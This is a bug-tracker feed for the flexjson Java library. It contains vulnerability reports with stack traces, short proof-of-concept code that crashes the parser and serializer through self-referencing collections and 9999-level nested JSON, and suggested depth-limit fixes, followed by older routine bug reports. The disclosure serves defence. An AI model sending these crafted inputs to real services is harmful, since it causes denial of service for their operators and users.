Recent changes to bugs

Stack overflow error caused by flexjson serialization List

guo yifan — Fri, 09 Jun 2023 07:09:21 -0000

Stack overflow error caused by flexjson serialization List

Description

flexjson before v3.3 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.util.Stack.push(Stack.java:67)
    at flexjson.JSONContext.pushTypeContext(JSONContext.java:140)
    at flexjson.JSONContext.writeOpenArray(JSONContext.java:268)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:24)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)
    at flexjson.transformer.IterableTransformer.transform(IterableTransformer.java:28)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.JSONContext.transform(JSONContext.java:72)

PoC

<dependency>
    <groupId>net.sf.flexjson</groupId>
    <artifactId>flexjson</artifactId>
    <version>3.3</version>
</dependency>

import flexjson.JSONSerializer;

import java.util.ArrayList;

public class PoC3 {
    public static void main(String[] args) {

        ArrayList<Object> list = new ArrayList<>();
        list.add(list);

        String s = new JSONSerializer().deepSerialize(list);
    }
}

Rectification Solution

Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）)

References

Stack overflow error caused by flexjson serialization Map

guo yifan — Thu, 08 Jun 2023 07:33:59 -0000

Stack overflow error caused by flexjson serialization Map

Description

flexjson before v3.3 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:631)
    at java.base/java.lang.StringBuilder.append(StringBuilder.java:218)
    at flexjson.StringBuilderOutputHandler.write(StringBuilderOutputHandler.java:38)
    at flexjson.JSONContext.writeQuoted(JSONContext.java:346)
    at flexjson.JSONContext.writeName(JSONContext.java:231)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:47)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)
    at flexjson.transformer.TransformerWrapper.transform(TransformerWrapper.java:22)
    at flexjson.transformer.MapTransformer.transform(MapTransformer.java:59)

PoC

<dependency>
    <groupId>net.sf.flexjson</groupId>
    <artifactId>flexjson</artifactId>
    <version>3.3</version>
</dependency>

import flexjson.JSONSerializer;

import java.util.HashMap;

public class PoC2 {
    public static void main(String[] args) {
        HashMap<String,Object> map=new HashMap<>();
        map.put("t",map);
        String s = new JSONSerializer().deepSerialize(map);
    }
}

Rectification Solution

Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）)

References

Stack overflow error caused by flexjson parsing (2)

guo yifan — Mon, 29 May 2023 03:17:43 -0000

Stack overflow error caused by flexjson parsing of untrusted JSON String

Description

Using flexjson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Error Log

Exception in thread "main" java.lang.StackOverflowError
    at java.base/java.lang.Character.getType(Character.java:10352)
    at java.base/java.lang.Character.isDigit(Character.java:9070)
    at java.base/java.lang.Character.isDigit(Character.java:9036)
    at flexjson.JSONTokener.isNumber(JSONTokener.java:572)
    at flexjson.JSONTokener.stringToValue(JSONTokener.java:562)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:384)
    at flexjson.JSONTokener.parseObject(JSONTokener.java:456)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:357)
    at flexjson.JSONTokener.parseObject(JSONTokener.java:471)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:357)
    at flexjson.JSONTokener.parseObject(JSONTokener.java:471)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:357)
    at flexjson.JSONTokener.parseObject(JSONTokener.java:471)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:357)
    at flexjson.JSONTokener.parseObject(JSONTokener.java:471)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:357)
    at flexjson.JSONTokener.parseObject(JSONTokener.java:471)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:357)
    at flexjson.JSONTokener.parseObject(JSONTokener.java:471)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:357)
    at flexjson.JSONTokener.parseObject(JSONTokener.java:471)

PoC

<dependency>
    <groupId>net.sf.flexjson</groupId>
    <artifactId>flexjson</artifactId>
    <version>3.3</version>
</dependency>

import flexjson.JSONDeserializer;

public class PoC {

    public final static int TOO_DEEP_NESTING = 9999;
    public final static String TOO_DEEP_DOC = "{" + _nestedDoc(TOO_DEEP_NESTING, "a : { ", "} ", "") + "}";


    public static String _nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        sb.append("\n").append(content).append("\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String jsonString = TOO_DEEP_DOC;
        new JSONDeserializer<>().deserialize(jsonString);
    }
}

Rectification Solution

Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）)

Stack overflow error caused by flexjson parsing

guo yifan — Wed, 24 May 2023 08:28:28 -0000

Stack overflow error caused by flexjson parsing of untrusted JSON String

Description

Error Log

Exception in thread "main" java.lang.StackOverflowError
    at flexjson.JSONTokener.nextClean(JSONTokener.java:226)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:506)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)
    at flexjson.JSONTokener.nextValue(JSONTokener.java:361)
    at flexjson.JSONTokener.parseArray(JSONTokener.java:525)

PoC

<dependency>
    <groupId>net.sf.flexjson</groupId>
    <artifactId>flexjson</artifactId>
    <version>3.3</version>
</dependency>

import com.code_intelligence.jazzer.api.FuzzedDataProvider;
import com.code_intelligence.jazzer.junit.FuzzTest;
import flexjson.JSONDeserializer;

public class PoC {

    public final static int TOO_DEEP_NESTING = 9999;
    public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "[ ", "] ", "0");


    public static String _nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        sb.append("\n").append(content).append("\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String jsonString = TOO_DEEP_DOC;
        new JSONDeserializer<>().deserialize(jsonString);
    }
}

Rectification Solution

Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)
Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）)

#47 @JSON(objectFactory=) annotation ignored

Dmitry Parhonin — Tue, 01 Dec 2015 12:59:25 -0000

Is this project supported?

Proposed fix:

--- ../../Sources/flexjson-3.3/flexjson/ObjectBinder.java (revision )
+++ ../../Sources/flexjson-3.3/flexjson/ObjectBinder.java (revision )
@@ -146,6 +146,7 @@
Type[] types = setMethod.getGenericParameterTypes();
if( types.length == 1 ) {
Type paramType = types[0];
+ value = convertValue(value, descriptor);
setMethod.invoke( objectStack.getLast(), bind( value, resolveParameterizedTypes( paramType, targetType ) ) );
} else {
throw new JSONException(currentPath + ": Expected a single parameter for method " + target.getClass().getName() + "." + setMethod.getName() + " but got " + types.length );
@@ -154,6 +155,7 @@
Field field = descriptor.getProperty();
if( field != null ) {
field.setAccessible( true );
+ value = convertValue(value, descriptor);
field.set( target, bind( value, field.getGenericType() ) );
}
}
@@ -169,6 +171,18 @@
}
}

private Object convertValue(Object value, BeanProperty property) {
ObjectFactory factory = null;
try {
factory = property.getObjectFactory();
if (factory != null)
value = factory.instantiate(this, value, property.getPropertyType(), property.getPropertyType());
} catch(InstantiationException | IllegalAccessException ex){
throw new JSONException("Cannot instantiate the property's object factory!", ex);
}
return value;
}
+
public JSONException cannotConvertValueToTargetType(Object value, Class targetType) {
return new JSONException( String.format("%s: Can not convert %s into %s", currentPath, value.getClass().getName(), targetType.getName() ) );
}

@JSON(objectFactory=) annotation ignored

Peter Rainer — Wed, 28 Oct 2015 19:45:50 -0000

Hello,

When I use the annoation
@JSON(objectFactory=MyTransformer.class, transformer=MyTransformer.class)
the transformer is used at time of serialization but the objectFactory is ignored at time of deserialization

Here is a sample application:
import java.lang.reflect.Type;

import flexjson.JSON;
import flexjson.JSONContext;
import flexjson.JSONDeserializer;
import flexjson.JSONSerializer;
import flexjson.ObjectBinder;
import flexjson.ObjectFactory;
import flexjson.transformer.Transformer;

public class FlexjsonTest {
@JSON(objectFactory=MyTransformer.class, transformer=MyTransformer.class)
private String test;

public FlexjsonTest() {
}

@JSON(objectFactory=MyTransformer.class, transformer=MyTransformer.class)
public void setTest(String test) {
this.test = test;
}

@JSON(objectFactory=MyTransformer.class, transformer=MyTransformer.class)
public String getTest() {
return this.test;
}

public static void main(String[] args) {
FlexjsonTest a = new FlexjsonTest();
a.setTest("ABC");

System.out.println("a.getTest() - "+a.getTest());
String json = new JSONSerializer().deepSerialize(a);
System.out.println(json);

FlexjsonTest b = new JSONDeserializer<FlexjsonTest>().deserialize(json);
System.out.println("b.getTest() - "+b.getTest());
}

public static class MyTransformer implements ObjectFactory, Transformer {
@Override
public Object instantiate(ObjectBinder context, Object value, Type targetType, @SuppressWarnings("rawtypes") Class targetClass) {
return "ABC";
}

@Override
public void transform(Object object) {
JSONContext.get().writeQuoted("123");
}
}
}

the transformer did work as expected and the value written to the Json is "123" (instead of "ABC" which is stored on the object) - but when deserializing the object the ObjectFactory referenced in the annotation is not used - instead the built in object factory is used. The output of this application is the following:

a.getTest() - ABC
{"class":"com.alpvue.hms.test.FlexjsonTest","test":"123"}
b.getTest() - 123

#44 Default transformers exception with null values

Charlie Hubbard — Wed, 15 Oct 2014 02:48:07 -0000

status: open --> closed-fixed

#13 "use" not working properly (on String)

Charlie Hubbard — Tue, 14 Oct 2014 14:57:06 -0000

status: open --> closed-invalid

#41 Concrete properties and interfaces

Charlie Hubbard — Tue, 14 Oct 2014 14:16:00 -0000

status: open --> closed-fixed
Group: 3.2.0 --> 3.0.0

#42 Deserializing into a Collection broken in 3.0

Charlie Hubbard — Tue, 14 Oct 2014 14:06:57 -0000

status: open --> closed-wont-fix